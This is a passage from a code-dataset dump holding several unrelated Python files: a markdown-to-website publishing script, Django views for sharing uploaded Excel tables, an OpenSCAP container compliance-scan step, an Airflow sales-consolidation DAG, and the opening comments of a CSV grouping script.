return str_to_write\n\n# ###########################################################\n# Description: Manipulates the .json file that acts\n# as the database.\n# ###########################################################\ndef alter_json_file(json_file_path, title, summary, html_text, replace = False, tag = \"Articles\"):\n\n with open(json_file_path, \"r+\") as fle:\n # Load our magic json file\n data = json.load(fle)\n\n # If we are editing/replacing our information then do this.\n if replace:\n found = False\n\n # Just do a simple linear search. 
Never going to get to the point where this is an issue.\n for i in range(0, len(data[tag])):\n if data[tag][i]['title'] == title:\n found = True\n data[tag][i]['summary'] = summary\n data[tag][i]['text'] = html_text\n\n # Raise a simple exception if you try to replace a json title that does not exist.\n if not found:\n raise Exception(\"Trying to replace with a title that does not exist.\")\n\n # Otherwise just write a new entry to the data dictionary, push out to file.\n else:\n date = datetime.datetime.now().strftime(r\"%m/%d/%Y\")\n new_dict = {\n \"title\": title,\n \"date\": date,\n \"summary\": summary,\n \"text\": html_text\n }\n data[tag].append(new_dict)\n \n # Write on out!\n fle.seek(0)\n json.dump(data, fle, indent=2)\n # Truncate leftover bytes in case the new JSON is shorter than the old contents.\n fle.truncate()\n \n# ###########################################################\n# Description: Super primitive function that copies all\n# files over from the image folder in the \n# specified markdown directory.\n# ###########################################################\ndef copy_over_images(source_folder, destination_folder):\n for root, dirs, files in os.walk(source_folder):\n for fle in files:\n if not os.path.exists(os.path.join(destination_folder, fle)):\n shutil.copy(os.path.join(source_folder, fle), os.path.join(destination_folder, fle))\n else:\n print(\"WARNING: Not copying as \" + fle + \" already exists in destination folder.\")\n\n# ###########################################################\n# Description: Builds the application with NPM.\n# ###########################################################\ndef build_application():\n os.system(\"npm run build\")\n\n# ###########################################################\n# Description: Does all the git needed to push it off.\n# ###########################################################\ndef git_commit_and_push(commit_message):\n os.system(\"git add *\")\n os.system(\"git commit -m \\\"\" + commit_message + \"\\\"\")\n os.system(\"git push\")\n\n# ###########################################################\n# Description: Helper function for boolean values in\n# arguments.\n# ###########################################################\ndef _bool_argument(val):\n if isinstance(val, bool):\n return val\n elif val.lower() in ['true', \"t\", 'yes']:\n return True\n elif val.lower() in ['false', 'f', 'no']:\n return False\n else:\n raise argparse.ArgumentTypeError(\"This field expects a boolean.\")\n\n\n\n\nif __name__ == \"__main__\":\n\n # Specify arguments\n parser = argparse.ArgumentParser(description = \"Converts markdown to html and pushes new build to site.\")\n parser.add_argument(\"input\", help = \"Path to markdown file.\")\n parser.add_argument(\"-n\", \"--name\", help = \"Name of article.\", required = True)\n parser.add_argument(\"-s\", \"--summary\", help = \"Summary of article.\", required = True)\n parser.add_argument('-u', \"--update_only\", type = _bool_argument, help = \"If we only want to build.\", default = False)\n parser.add_argument(\"-r\", \"--replace\", type = _bool_argument, help = \"Replace article information.\", default = False)\n\n # Parse arguments\n args = parser.parse_args()\n\n # Convert to HTML and add to json.\n html = convert_file_to_html(args.input)\n alter_json_file(\"../src/articles/projects.json\", args.name, args.summary, html, replace = args.replace)\n\n # Get image path from markdown files\n md_image_path = os.path.dirname(args.input) + \"/images\"\n\n # Copy over the images to the folder that includes items.\n copy_over_images(md_image_path, \"../public/images\")\n\n\n 
if args.update_only == False:\n # Build the application with NPM!\n os.chdir(BASE_DIR + \"/../\")\n build_application()\n\n copy_tree(BASE_DIR + \"/../build\", BUILD_DIR)\n\n # Commit and push!\n commit_message = \"Committing article \" + args.name\n os.chdir(BUILD_DIR)\n git_commit_and_push(commit_message)\n","repo_name":"EvanMPutnam/Personal-Website","sub_path":"utils/generate_article.py","file_name":"generate_article.py","file_ext":"py","file_size_in_byte":6025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43569031938","text":"from json.decoder import JSONDecodeError\nfrom django.shortcuts import render\nfrom django.http import StreamingHttpResponse, HttpResponseRedirect, HttpResponse\nfrom django.forms.models import model_to_dict\nfrom django.http import JsonResponse\nfrom openpyxl import load_workbook\nfrom users.models import VkUser\nfrom .models import ExcelTable\nfrom django.views.decorators.csrf import csrf_exempt\nimport json\nimport datetime\n# Create your views here.\n\n\n@csrf_exempt\ndef uploadExcelTable(request):\n if request.method == 'POST':\n user_pk = request.GET['user_pk']\n is_public = request.GET['is_public']\n title = request.GET['title']\n user = VkUser.objects.get(pk=user_pk)\n\n file_d = request.FILES['file']\n excel_file = file_d\n tables = buildTablesFromExcel(excel_file)\n\n response = []\n is_public_local = True if int(is_public) == 1 else False\n for table in tables:\n new_table = ExcelTable(\n owner=user, data=json.dumps(table, default=str), is_public=is_public_local, title=title)\n new_table.save()\n response.append(\n {'id': new_table.pk, 'is_public': new_table.is_public, 'owner': model_to_dict(new_table.owner), 'title': new_table.title})\n return JsonResponse(response, safe=False)\n\n\n@csrf_exempt\ndef updateExcelTable(request):\n if request.method == 'POST':\n data = json.loads(request.body.decode('utf-8'))\n title = data.get('title', '')\n id = data.get('id', -1)\n is_public = data.get('is_public', False)\n\n table = ExcelTable.objects.get(pk=id)\n table.is_public = is_public\n table.title = title\n table.save()\n return HttpResponse(status=200)\n\n\n@csrf_exempt\ndef getExcelTables(request):\n if request.method == 'POST':\n data = json.loads(request.body.decode('utf-8'))\n user_pk = data.get('user_pk', -1)\n\n public = ExcelTable.objects.all().filter(\n is_public=True).exclude(owner__pk=user_pk)\n owned = ExcelTable.objects.all().filter(owner__pk=user_pk)\n\n response = {'public': [], 'owned': []}\n\n for t in public:\n response['public'].append(\n {'id': t.pk, 'is_public': t.is_public, 'owner': model_to_dict(t.owner), 'title': t.title})\n\n for t in owned:\n response['owned'].append(\n {'id': t.pk, 'is_public': t.is_public, 'owner': model_to_dict(t.owner), 'title': t.title})\n\n return JsonResponse(response, safe=False)\n\n\n@csrf_exempt\ndef getExcelTable(request):\n if request.method == 'POST':\n data = json.loads(request.body.decode('utf-8'))\n user_pk = data.get('user_pk', -1)\n table_pk = data.get('table_pk', -1)\n\n t = ExcelTable.objects.get(pk=table_pk)\n if t.is_public == False and t.owner.pk != user_pk:\n return HttpResponse(status=403)\n\n response = {'id': t.pk, 'is_public': t.is_public,\n 'owner': model_to_dict(t.owner), 'data': json.loads(t.data), 'title': t.title}\n\n return JsonResponse(response, safe=False)\n\n\n@csrf_exempt\ndef deleteExcelTable(request):\n if request.method == 'DELETE':\n id = request.GET['id']\n table = ExcelTable.objects.get(pk=id)\n 
table.delete()\n return HttpResponse(status=200)\n\n# test\n\n\ndef buildTablesFromExcel(data_file):\n result = []\n wb = load_workbook(data_file)\n\n for sheet in wb.sheetnames:\n count = 0\n ws = wb[sheet]\n table = {\n 'table_names': [],\n 'rows': []\n }\n\n for row in ws:\n if not any(cell.value for cell in row):\n pass\n else:\n count += 1\n if count == 1:\n for cell in row:\n table['table_names'].append(str(cell.value))\n\n else:\n result_row = {}\n cell_count_max = len(table['table_names'])\n cell_count = 0\n for cell in row:\n cell_count += 1\n if cell_count > cell_count_max:\n pass\n else:\n value = '' if cell.value is None else cell.value\n index = table['table_names'][cell_count-1]\n result_row[index] = value\n table['rows'].append(result_row)\n result.append(table)\n return result\n","repo_name":"sovladlisin/vtarget-backend","sub_path":"excel_tables/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37394629292","text":"\"\"\"Step Implementer for the container-image-static-compliance-scan step for OpenSCAP.\n\nStep Configuration\n------------------\n\nStep configuration expected as input to this step.\nCould come from either configuration file or\nfrom runtime configuration.\n\n| Configuration Key | Required? | Default | Description\n|--------------------------------|-----------|---------|-----------\n| `oscap-input-definitions-uri` | Yes | | URI to the OpenSCAP definitions file\n| | | | to do the evaluation with.\n| | | | Must use protocol file://|http://|https://.\n| | | | Must have file extension .xml|.bz2.\n| `oscap-profile` | No | | OpenSCAP profile to evaluate.\n| `oscap-tailoring-uri` | No | | URI to OpenSCAP tailoring file\n| | | | to do the evaluation with.\n| | | | Must use protocol file://|http://|https://.\n| | | | Must have file extension .xml|.bz2.\n| `oscap-fetch-remote-resources` | No | True | For Source DataStream and XCCDF files\n| | | | that have remote references fetch them if\n| | | | True, else don't.\n| | | |\n| | | | WARNING: evaluations will not be complete\n| | | | if input defintions require remote\n| | | | resources and this is not True.\n| | | | For disconnected environments the remote\n| | | | references should be brought to an internal\n| | | | mirror.\n\nExpected Previous Step Results\n------------------------------\n\nResults expected from previous steps that this step requires.\n\n| Step Name | Result Key | Description\n|--------------------------|------------------|--------------\n| `create-container-image` | `image-tar-file` | Image to scan\n\nResults\n-------\n\nResults output by this step.\n\n| Result Key | Description\n|-----------------|------------\n| `html-report` | HTML report generated by oscap eval\n| `xml-report` | XML report generated by oscap eval\n| `stdout-report` | stdout report generated by oscap eval\n\"\"\"\n\nimport os\nimport re\nimport sys\nfrom distutils.util import strtobool\nfrom io import StringIO\n\nimport sh\nfrom tssc import DefaultSteps, StepImplementer\nfrom tssc.exceptions import TSSCException\nfrom tssc.utils.file import download_and_decompress_source_to_destination\nfrom tssc.utils.io import create_sh_redirect_to_multiple_streams_fn_callback\n\nDEFAULT_CONFIG = {\n 'oscap-fetch-remote-resources': True\n}\n\nREQUIRED_CONFIG_KEYS = [\n 'oscap-input-definitions-uri'\n]\n\nclass OpenSCAPGeneric(StepImplementer):\n \"\"\"A generic OpenSCAP step implementer that can be used for more 
then one step.\n\n Expected uses:\n * container-image-static-compliance-scan\n * container-image-static-vulnerability-scan\n \"\"\"\n\n # Example Input:\n # Title\tRHSA-2020:4186: spice and spice-gtk security update (Important)\n # Rule\txccdf_com.redhat.rhsa_rule_oval-com.redhat.rhsa-def-20204186\n # Ident\tRHSA-2020:4186\n # Ident\tCVE-2020-14355\n # Result\tpass\n #\n # Title\tRHSA-2020:3658: librepo security update (Important)\n # Rule\txccdf_com.redhat.rhsa_rule_oval-com.redhat.rhsa-def-20203658\n # Ident\tRHSA-2020:3658\n # Ident\tCVE-2020-14352\n # Result\tfail\n #\n # Matches:\n # (Title\tRHSA-2020:4186: spice and spice-gtk security update (Important)\n # Rule\txccdf_com.redhat.rhsa_rule_oval-com.redhat.rhsa-def-20204186\n # Ident\tRHSA-2020:4186\n # Ident\tCVE-2020-14355\n # Result\t(pass))\n #\n # (Title\tRHSA-2020:3658: librepo security update (Important)\n # Rule\txccdf_com.redhat.rhsa_rule_oval-com.redhat.rhsa-def-20203658\n # Ident\tRHSA-2020:3658\n # Ident\tCVE-2020-14352\n # Result\t(fail))\n #\n # Named Groups:\n # [0]ruleblock\n # Title\tRHSA-2020:4186: spice and spice-gtk security update (Important)\n # Rule\txccdf_com.redhat.rhsa_rule_oval-com.redhat.rhsa-def-20204186\n # Ident\tRHSA-2020:4186\n # Ident\tCVE-2020-14355\n # Result\tpass\n # [0]ruleresult\n # pass\n #\n # [1]ruleblock\n # Title\tRHSA-2020:3658: librepo security update (Important)\n # Rule\txccdf_com.redhat.rhsa_rule_oval-com.redhat.rhsa-def-20203658\n # Ident\tRHSA-2020:3658\n # Ident\tCVE-2020-14352\n # Result\tfail\n # [1]ruleresult\n # fail\n OSCAP_XCCDF_STDOUT_PATTERN = re.compile(\n r'(?PTitle.+?Result\\s+(?P[^\\n]+))\\n',\n re.DOTALL\n )\n OSCAP_XCCDF_STDOUT_FAIL_PATTERN = re.compile(r'fail')\n\n # NOTE: oval output far less useful then xccdf output but it is all but given some content\n # is only given in oval format and therefor supporting this is important\n #\n # Example Input:\n # Definition oval:com.redhat.rhsa:def:20202031: false\n # Definition oval:com.redhat.rhsa:def:20201998: true\n #\n # Matches:\n # (Definition oval:com.redhat.rhsa:def:20202031: (false))\n # (Definition oval:com.redhat.rhsa:def:20201998: (true))\n #\n # Named Groups:\n # [0]ruleblock\n # Definition oval:com.redhat.rhsa:def:20202031: false\n # [0]ruleresult\n # false\n #\n # [1]ruleblock\n # Definition oval:com.redhat.rhsa:def:20201998: true\n # [1]ruleresult\n # true\n OSCAP_OVAL_STDOUT_PATTERN = re.compile(\n r'(?P^.*:\\s*(?Ptrue|false)\\s*$)$',\n re.MULTILINE\n )\n OSCAP_OVAL_STDOUT_FAIL_PATTERN = re.compile(r'true')\n\n OSCAP_INFO_DOC_TYPE_PATTERN = re.compile(r'Document type: (?P.+)')\n\n @staticmethod\n def step_implementer_config_defaults():\n \"\"\"\n Getter for the StepImplementer's configuration defaults.\n\n Notes\n -----\n These are the lowest precedence configuration values.\n\n Returns\n -------\n dict\n Default values to use for step configuration values.\n \"\"\"\n return DEFAULT_CONFIG\n\n @staticmethod\n def required_runtime_step_config_keys():\n \"\"\"\n Getter for step configuration keys that are required before running the step.\n\n See Also\n --------\n _validate_runtime_step_config\n\n Returns\n -------\n array_list\n Array of configuration keys that are required before running the step.\n \"\"\"\n return REQUIRED_CONFIG_KEYS\n\n def _validate_runtime_step_config(self, runtime_step_config):\n \"\"\"Validates required runtime step configuration is valid.\n\n Validates that:\n * required configuration is given\n * oscap-input-definitions-uri\n - starts with file://|http://|https://\n - ends with 
.xml|.bz2\n\n Raises\n ------\n AssertionError\n * if runtime step configuration is invalid.\n \"\"\"\n super()._validate_runtime_step_config(runtime_step_config) # pylint: disable=protected-access\n\n # validate that the given 'oscap-input-definitions-uri' starts with file://|http://|https://\n oscap_input_definitions_uri = runtime_step_config['oscap-input-definitions-uri']\n assert (re.match(r'^file://|http://|https://', oscap_input_definitions_uri)), \\\n f\"Open SCAP input definitions source ({oscap_input_definitions_uri})\" \\\n f\" must start with known protocol (file://|http://|https://).\"\n\n # validate that the given 'oscap-input-definitions-uri' is an xml or bz2 file\n oscap_input_definitions_uri_extension = os.path.splitext(oscap_input_definitions_uri)[1]\n assert (re.match(r'\\.xml|\\.bz2', oscap_input_definitions_uri_extension)), \\\n f\"Open SCAP input definitions source ({oscap_input_definitions_uri})\" \\\n f\" must be of known type (xml|bz2), got: {oscap_input_definitions_uri_extension}\"\n\n def _run_step(self): # pylint: disable=too-many-locals\n \"\"\"Runs the OpenSCAP eval for a given input file against a given container.\n \"\"\"\n image_tar_file = ''\n if(self.get_step_results(DefaultSteps.CREATE_CONTAINER_IMAGE) and \\\n self.get_step_results(DefaultSteps.CREATE_CONTAINER_IMAGE).get('image-tar-file')):\n image_tar_file = self.\\\n get_step_results(DefaultSteps.CREATE_CONTAINER_IMAGE)['image-tar-file']\n else:\n raise RuntimeError('Missing image tar file from ' + DefaultSteps.CREATE_CONTAINER_IMAGE)\n\n oscap_profile = self.get_config_value('oscap-profile')\n oscap_fetch_remote_resources = self.get_config_value('oscap-fetch-remote-resources')\n\n # create a container name from the tar file name, step name, and sub step name\n container_name = os.path.splitext(os.path.basename(image_tar_file))[0]\n container_name += f\"-{self.step_name}-{self.sub_step_name}\"\n\n # import image tar file to vfs file system\n print(f\"\\nImport image: {image_tar_file}\")\n OpenSCAPGeneric.__buildah_import_image_from_tar(\n image_tar_file=image_tar_file,\n container_name=container_name\n )\n print(f\"Imported image: {image_tar_file}\")\n\n # baking `buildah unshare` command to wrap other buildah commands with\n # so that container does not need to be running in a privilaged mode to be able\n # to function\n buildah_unshare_comand = sh.buildah.bake('unshare') # pylint: disable=no-member\n\n # mount the container filesystem and get mount path\n #\n # NOTE: run in the context of `buildah unshare` so that container does not\n # need to be run in a privilaged mode\n print(f\"\\nMount container: {container_name}\")\n container_mount_path = OpenSCAPGeneric.__buildah_mount_container(\n buildah_unshare_comand=buildah_unshare_comand,\n container_id=container_name\n )\n print(f\"Mounted container ({container_name}) with mount path: '{container_mount_path}'\")\n\n # download the open scap input file\n oscap_input_definitions_uri = self.get_config_value('oscap-input-definitions-uri')\n print(f\"\\nDownload input definitions: {oscap_input_definitions_uri}\")\n oscap_input_file = download_and_decompress_source_to_destination(\n source_url=oscap_input_definitions_uri,\n destination_dir=self.get_working_dir()\n )\n print(f\"Download input definitions to: {oscap_input_file}\")\n\n # if specified download oscap tailoring file\n oscap_tailoring_file = None\n oscap_tailoring_file_uri = self.get_config_value('oscap-tailoring-uri')\n if oscap_tailoring_file_uri:\n print(f\"\\nDownload oscap tailoring file: 
{oscap_tailoring_file_uri}\")\n oscap_tailoring_file = download_and_decompress_source_to_destination(\n source_url=oscap_tailoring_file_uri,\n destination_dir=self.get_working_dir()\n )\n print(f\"Download oscap tailoring file to: {oscap_tailoring_file}\")\n\n # determine oscap eval type based on document type\n print(f\"\\nDetermine OpenSCAP document type of input file: {oscap_input_file}\")\n oscap_document_type = OpenSCAPGeneric.__get_oscap_document_type(\n oscap_input_file=oscap_input_file\n )\n print(\n \"Determined OpenSCAP document type of input file\"\n f\" ({oscap_input_file}): {oscap_document_type}\"\n )\n print(\n f\"\\nDetermine OpenSCAP eval type for input file ({oscap_input_file}) \"\n f\"of document type: {oscap_document_type}\"\n )\n oscap_eval_type = OpenSCAPGeneric.__get_oscap_eval_type_based_on_document_type(\n oscap_document_type=oscap_document_type\n )\n print(\n f\"Determined OpenSCAP eval type of input file ({oscap_input_file}): {oscap_eval_type}\"\n )\n\n # Execute scan in the context of buildah unshare\n #\n # NOTE: run in the context of `buildah unshare` so that container does not\n # need to be run in a privilaged mode\n oscap_out_file_path = self.write_working_file(f'oscap-{oscap_eval_type}-out')\n oscap_xml_results_file_path = self.write_working_file(\n f'oscap-{oscap_eval_type}-results.xml'\n )\n oscap_html_report_path = self.write_working_file(f'oscap-{oscap_eval_type}-report.html')\n print(\"\\nRun oscap scan\")\n oscap_eval_success, oscap_eval_fails = OpenSCAPGeneric.__run_oscap_scan(\n buildah_unshare_comand=buildah_unshare_comand,\n oscap_eval_type=oscap_eval_type,\n oscap_input_file=oscap_input_file,\n oscap_out_file_path=oscap_out_file_path,\n oscap_xml_results_file_path=oscap_xml_results_file_path,\n oscap_html_report_path=oscap_html_report_path,\n container_mount_path=container_mount_path,\n oscap_profile=oscap_profile,\n oscap_tailoring_file=oscap_tailoring_file,\n oscap_fetch_remote_resources=oscap_fetch_remote_resources\n )\n print(\n f\"OpenSCAP Scan Completed. 
Report: {oscap_html_report_path}\\n\"\n )\n\n # NOTE: this should not raise an exception once we have new Results object\n # since this is an \"expected\" \"valid\" failure...\n # but this is the solution for now\n if not oscap_eval_success:\n raise TSSCException(f\"OSCAP eval found issues:\\n{oscap_eval_fails}\")\n\n results = {\n 'result': {\n 'success': True\n },\n 'report-artifacts': [\n {\n 'name': 'html-report',\n 'path': f'file://{oscap_html_report_path}'\n },\n {\n 'name': 'xml-report',\n 'path': f'file://{oscap_xml_results_file_path}'\n },\n {\n 'name': 'stdout-report',\n 'path': f'file://{oscap_out_file_path}'\n }\n ]\n }\n return results\n\n @staticmethod\n def __buildah_import_image_from_tar(image_tar_file, container_name):\n \"\"\"Import a container image using buildah form a TAR file.\n\n Parameters\n ----------\n image_tar_file : str\n Path to TAR file to import as a container image.\n container_name : str\n name for the working container.\n\n Returns\n -------\n str\n Name of the imported container.\n \"\"\"\n # import image tar file to vfs file system\n try:\n sh.buildah( # pylint: disable=no-member\n 'from',\n '--storage-driver', 'vfs',\n '--name', container_name,\n f\"docker-archive:{image_tar_file}\",\n _out=sys.stdout,\n _err=sys.stderr,\n _tee='err'\n )\n except sh.ErrorReturnCode as error:\n raise RuntimeError(\n f'Unexpected runtime error importing the image ({image_tar_file}): {error}'\n ) from error\n\n return container_name\n\n @staticmethod\n def __buildah_mount_container(buildah_unshare_comand, container_id):\n \"\"\"Use buildah to mount a container.\n\n Parameters\n ----------\n buildah_unshare_comand : sh.buildah.unshare.bake()\n A baked sh.buildah.unshare command to use to run this command in the context off\n so that this can be done \"rootless\".\n container_id : str\n ID of the container to mount.\n\n Returns\n -------\n str\n Absolute path to the mounted container.\n \"\"\"\n mount_path = None\n try:\n buildah_mount_out_buff = StringIO()\n buildah_mount_out_callback = create_sh_redirect_to_multiple_streams_fn_callback([\n sys.stdout,\n buildah_mount_out_buff\n ])\n buildah_mount_command = buildah_unshare_comand.bake(\"buildah\", \"mount\")\n buildah_mount_command(\n '--storage-driver', 'vfs',\n container_id,\n _out=buildah_mount_out_callback,\n _err=sys.stderr,\n _tee='err'\n )\n mount_path = buildah_mount_out_buff.getvalue().rstrip()\n except sh.ErrorReturnCode as error:\n raise RuntimeError(\n f'Unexpected runtime error mounting container ({container_id}): {error}'\n ) from error\n\n return mount_path\n\n @staticmethod\n def __get_oscap_document_type(oscap_input_file):\n \"\"\"Gets the OpenSCAP document type for a given input file.\n\n Parameters\n ----------\n oscap_input_file : path\n Path to OSCAP file to determine the OpenSCAP document type of.\n\n Returns\n -------\n str\n OpenSCAP document type. 
For example:\n * Source Data Stream\n * XCCDF Checklist\n * OVAL Definitions\n\n Raises\n ------\n ErrorReturnCode\n If unexpected error occurred\n \"\"\"\n\n oscap_document_type = None\n try:\n oscap_info_out_buff = StringIO()\n sh.oscap.info( # pylint: disable=no-member\n oscap_input_file,\n _out=oscap_info_out_buff\n )\n oscap_info_out = oscap_info_out_buff.getvalue().rstrip()\n oscap_document_type_match = OpenSCAPGeneric.OSCAP_INFO_DOC_TYPE_PATTERN.search(\n oscap_info_out\n )\n oscap_document_type = oscap_document_type_match.groupdict()['doctype']\n except sh.ErrorReturnCode as error:\n raise RuntimeError(\n f\"Unexpected error getting document type of oscap input file\"\n f\" ({oscap_input_file}): {error}\"\n ) from error\n\n return oscap_document_type\n\n @staticmethod\n def __get_oscap_eval_type_based_on_document_type(oscap_document_type):\n \"\"\"Given an OSCAP document type returns the type of oscap eval that should be used.\n\n Parameters\n ----------\n oscap_document_type : str\n OSCAP Document type to get the oscap eval type for.\n\n Returns\n -------\n str\n OSCAP eval type to perform on document with given oscap document type.\n \"\"\"\n oscap_eval_type = None\n\n if oscap_document_type == 'Source Data Stream':\n oscap_eval_type = 'xccdf'\n elif oscap_document_type == 'XCCDF Checklist':\n oscap_eval_type = 'xccdf'\n elif oscap_document_type == 'OVAL Definitions':\n oscap_eval_type = 'oval'\n\n return oscap_eval_type\n\n @staticmethod\n def __run_oscap_scan( # pylint: disable=too-many-arguments,too-many-locals,too-many-branches,too-many-statements\n buildah_unshare_comand,\n oscap_eval_type,\n oscap_input_file,\n oscap_out_file_path,\n oscap_xml_results_file_path,\n oscap_html_report_path,\n container_mount_path,\n oscap_profile=None,\n oscap_tailoring_file=None,\n oscap_fetch_remote_resources=True\n ):\n \"\"\"Run an oscap scan in the context of a buildah unshare to run \"rootless\".\n\n Parameters\n ----------\n buildah_unshare_comand : sh.buildah.unshare.bake()\n A baked sh.buildah.unshare command to use to run this command in the context off\n so that this can be done \"rootless\".\n oscap_eval_type : str\n The type of oscap eval to perform. Must be a valid oscap eval type.\n EX: xccdf, oval\n oscap_input_file : str\n Path to rules file passed to the oscap command.\n oscap_out_file_path : str\n Path to write the stdout and stderr of running the oscap command to.\n oscap_xml_results_file_path : str\n Write the scan results into this file.\n oscap_html_report_path : str\n Write the human readable (HTML) report into this file.\n container_mount_path : str\n Path to the mounted container to scan.\n oscap_tailoring_file : str\n XCCF Tailoring file.\n See:\n - https://www.open-scap.org/security-policies/customization/\n - https://www.open-scap.org/resources/documentation/customizing-scap-security-guide-for-your-use-case/ # pylint: disable=line-too-long\n - https://static.open-scap.org/openscap-1.2/oscap_user_manual.html#_how_to_tailor_source_data_stream # pylint: disable=line-too-long\n oscap_profile : str\n OpenSCAP profile to evaluate. 
Must be a valid profile in the given oscap_input_file.\n EX: if you perform an `oscap info oscap_input_file` the profile must be listed.\n\n Returns\n -------\n oscap_eval_success : bool\n True if oscap eval passed all rules\n False if oscap eval failed any rules\n oscap_eval_fails : str\n If oscap_eval_success is True then indeterminate.\n If oscap_eval_success is False then string of all of the failed rules.\n\n Raises\n ------\n RuntimeError\n If unexpected error running oscap scan.\n \"\"\"\n\n oscap_profile_flag = None\n if oscap_profile is not None:\n oscap_profile_flag = f\"--profile={oscap_profile}\"\n\n oscap_fetch_remote_resources_flag = None\n if isinstance(oscap_fetch_remote_resources, str):\n oscap_fetch_remote_resources = strtobool(oscap_fetch_remote_resources)\n if oscap_fetch_remote_resources:\n oscap_fetch_remote_resources_flag = \"--fetch-remote-resources\"\n\n oscap_tailoring_file_flag = None\n if oscap_tailoring_file is not None:\n oscap_tailoring_file_flag = f\"--tailoring-file={oscap_tailoring_file}\"\n\n oscap_eval_success = None\n oscap_eval_out_buff = StringIO()\n oscap_eval_out = \"\"\n oscap_eval_fails = None\n try:\n oscap_chroot_command = buildah_unshare_comand.bake(\"oscap-chroot\")\n with open(oscap_out_file_path, 'w') as oscap_out_file:\n out_callback = create_sh_redirect_to_multiple_streams_fn_callback([\n oscap_eval_out_buff,\n oscap_out_file\n ])\n err_callback = create_sh_redirect_to_multiple_streams_fn_callback([\n oscap_eval_out_buff,\n oscap_out_file\n ])\n oscap_chroot_command(\n container_mount_path,\n oscap_eval_type,\n 'eval',\n oscap_profile_flag,\n oscap_fetch_remote_resources_flag,\n oscap_tailoring_file_flag,\n f'--results={oscap_xml_results_file_path}',\n f'--report={oscap_html_report_path}',\n oscap_input_file,\n _out=out_callback,\n _err=err_callback,\n _tee='err'\n )\n oscap_eval_success = True\n except sh.ErrorReturnCode_1 as error: # pylint: disable=no-member\n oscap_eval_success = error\n except sh.ErrorReturnCode_2 as error: # pylint: disable=no-member\n # XCCDF: If there is at least one rule with either fail or unknown result,\n # oscap-scan finishes with return code 2.\n # OVAL: Never returned\n #\n # Source: https://www.systutorials.com/docs/linux/man/8-oscap/\n if oscap_eval_type == 'xccdf':\n oscap_eval_success = False\n else:\n oscap_eval_success = error\n except sh.ErrorReturnCode as error:\n oscap_eval_success = error\n\n # get the oscap output\n oscap_eval_out = oscap_eval_out_buff.getvalue()\n\n # parse the oscap output\n # NOTE: oscap is puts carrage returns (\\r / ^M) in their output, remove them\n oscap_eval_out = re.sub('\\r', '', oscap_eval_out)\n\n # print the oscap output no matter the results\n print(oscap_eval_out)\n\n # if unexpected error throw error\n if isinstance(oscap_eval_success, Exception):\n raise RuntimeError(\n f\"Unexpected error running 'oscap {oscap_eval_type} eval': {oscap_eval_success} \"\n ) from oscap_eval_success\n\n # NOTE: oscap oval eval returns exit code 0 whether or not any rules failed\n # need to search output to determine if there were any rule failures\n if oscap_eval_type == 'oval' and oscap_eval_success:\n oscap_eval_fails = \"\"\n for match in OpenSCAPGeneric.OSCAP_OVAL_STDOUT_PATTERN.finditer(oscap_eval_out):\n # NOTE: need to do regex and not == because may contain xterm color chars\n if OpenSCAPGeneric.OSCAP_OVAL_STDOUT_FAIL_PATTERN.search(\n match.groupdict()['ruleresult']\n ):\n oscap_eval_fails += match.groupdict()['ruleblock']\n oscap_eval_fails += \"\\n\"\n oscap_eval_success = 
False\n\n        # if failed xccdf eval then parse out the fails\n        if oscap_eval_type == 'xccdf' and not oscap_eval_success:\n            oscap_eval_fails = \"\"\n            for match in OpenSCAPGeneric.OSCAP_XCCDF_STDOUT_PATTERN.finditer(oscap_eval_out):\n                # NOTE: need to do regex and not == because may contain xterm color chars\n                if re.search(r'fail', match.groupdict()['ruleresult']):\n                    oscap_eval_fails += \"\\n\"\n                    oscap_eval_fails += match.groupdict()['ruleblock']\n                    oscap_eval_fails += \"\\n\"\n\n        return oscap_eval_success, oscap_eval_fails\n","repo_name":"shaneboulden/tssc-python-package","sub_path":"tssc/step_implementers/shared/openscap_generic.py","file_name":"openscap_generic.py","file_ext":"py","file_size_in_byte":26461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"12574588406","text":"from datetime import timedelta\n\nfrom airflow import DAG\nfrom airflow.hooks.mysql_hook import MySqlHook\nfrom airflow.operators.python_operator import PythonOperator\nfrom airflow.sensors.external_task_sensor import ExternalTaskSensor\nfrom airflow.utils.dates import days_ago\nfrom structlog import get_logger\nimport pandas as pd\n\nlogger = get_logger()\n\n\nQUERY = \"\"\"\nSELECT\n    year_id, month_id, SUM(sales) AS sales_amount\nFROM\n    test.sales\nGROUP BY 1 , 2\n\"\"\"\nCONNECTION_DB_NAME = 'mysql_db'\n\ndef etl_process(**kwargs):\n    logger.info(kwargs[\"execution_date\"])\n    mysql_connection = MySqlHook(mysql_conn_id=CONNECTION_DB_NAME).get_sqlalchemy_engine()\n\n    df = pd.read_sql(QUERY, con=mysql_connection, coerce_float=False)\n\n    with mysql_connection.begin() as connection:\n        connection.execute(\"DELETE FROM test.consolidate_sales WHERE 1=1\")\n        df.to_sql(\"consolidate_sales\", con=connection, schema=\"test\", if_exists=\"append\", index=False)\n\n    logger.info(f\"Rows inserted {len(df.index)}\")\n\n\n\ndag = DAG('consolidate_dag', description='Dag to Consolidate Sales',\n          default_args={\n              'owner': 'obed.espinoza',\n              'depends_on_past': False,\n              'max_active_runs': 1\n          },\n          start_date=days_ago(5),\n          schedule_interval='0 0 * * *',\n          catchup=False)\n\nsensor = ExternalTaskSensor(task_id=\"sales_etl_sensor\",\n                            external_dag_id=\"sales_ingestion_dag\",\n                            external_task_id=\"sales_etl\",\n                            execution_date_fn=lambda dt: dt + timedelta(hours=1),\n                            dag=dag)  # attach the sensor to the DAG so that `sensor >> etl` below works\n\netl = PythonOperator(task_id=\"consolidate_task\",\n                     provide_context=True,\n                     python_callable=etl_process,\n                     dag=dag\n                     )\n\nsensor >> etl\n","repo_name":"obedaeg/airflow","sub_path":"dags/consolidate_dag.py","file_name":"consolidate_dag.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"6086528899","text":"import os,sys,configparser,getopt\nimport csv\n\n\n\n# 1. Group the rows of a single file by its key column (gene_name (mus_musculus_ensembl_v80_Genes)).\n# 2. Within each group of a single file, sum the values of the follow column (Frequency).\n# note:\n# Grouping rule: rows whose key-column value has the same name belong to the same group.\n# 3. Batch summing over many files is supported: key columns from different files are grouped\n#    together under the same rule, i.e. cross-file grouping.\n# 4. 